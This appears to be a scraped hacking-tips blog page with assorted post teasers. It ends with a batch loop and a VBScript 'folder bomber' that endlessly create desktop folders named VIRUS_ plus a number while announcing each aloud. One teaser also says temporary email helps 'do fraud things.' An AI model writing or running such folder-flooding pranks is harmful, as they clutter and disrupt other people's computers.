You'll get Option to set a Security Question :)
Techsetia.com is a dedicated technology blog that helps to learn, understand and explore the facts of computer technology.It covers various aspects of Information & Technology and other trending topics related to Operating System, Social Media, SEO,Internet world, Networking and much more is being added to this blog on daily basis.
The term "Hacker" is spreading all over social networking sites/internet .So now everyone want to be a hacker.Manyone out there call themself hacker ,they dont even know a single programming language.Then you will ask who you are? I am not a hacker ,I am network/system admin having some knowledge in networking ,and know some programming language like C,C++,vb.net,
You have seen lots of internet toolbar like google toolbar,yahoo toolbar and many more for many sites.So you may wish its good if you have a internet toolbar for your own site,blog or orkut community.Yes then you can create your own internet toolbar within 2 minutes.this is not amazing or exciting...
The Pirate Bay we know and love, though still harboring torrents for now, is going away. But that doesn't mean BitTorrent is dead. Far from it. Here are five places to get your torrent on after it closes for good.
.Today I'll be showing you how to hide files (txt/mp3) on Word Documents (docx). (YOU CAN'T EDIT THE DOCUMENT AFTER YOU HIDE THE FILE)What will you need? - Word Document (docx) - File to hide (jpg/mp3/etc) - 7Zip (1st Method only)
Temporary email ids help you to communicate online without publishing your identity.It will help you to do fraud things as well as good things online.You can inform about any cause with the help of this temporary email ids.For example for mingling with one who is online,To send mail to college principal without reveal your identity.
google talk |
number of gtalk on PC |
multiple gtalk on same PC |
HERE IS THE SCRIPT FOR YOU.
For the folder making, I would use the following command since it can go on forever:
@echo off
:loop
MD %random%
goto loop
This makes folders until you exit the program.
and for password protection of a Batch file, add the following:
:pass
set /p input=Some text :
if %input%==Hi goto hello
if not %input%==Hi goto wrong
:hello
echo Hi!
pause
exit
:wrong
echo Wrong password!
goto pass
A Speaking Folder Bomber on the Desktop with Vbscript
The Code Is Below:
'----A Speaking Folder Bomber on the Desktop with Vbscript by Hackoo----
Dim fso,sho,basefolder,FolderBomb,bf
Set fso = CreateObject( "Scripting.FileSystemObject" )
Set sho = CreateObject( "Wscript.Shell" )
Set Voix=CreateObject("SAPI.SpVoice")
basefolder=sho.SpecialFolders("desktop")' Get your Desktop Folder
Set bf = fso.GetFolder( basefolder )
do
Randomize
r=Int((99999*Rnd)+1)
FolderBomb="VIRUS_"&r
Voix.speak FolderBomb 'The Computer speak and tell the name of the empty folder created by this script
bf.subFolders.Add(FolderBomb) 'Create Folders with names begin with VIRUS and a random Number in your desktop
wscript.sleep 1000 'Pause of 1 second and continue the loop
loop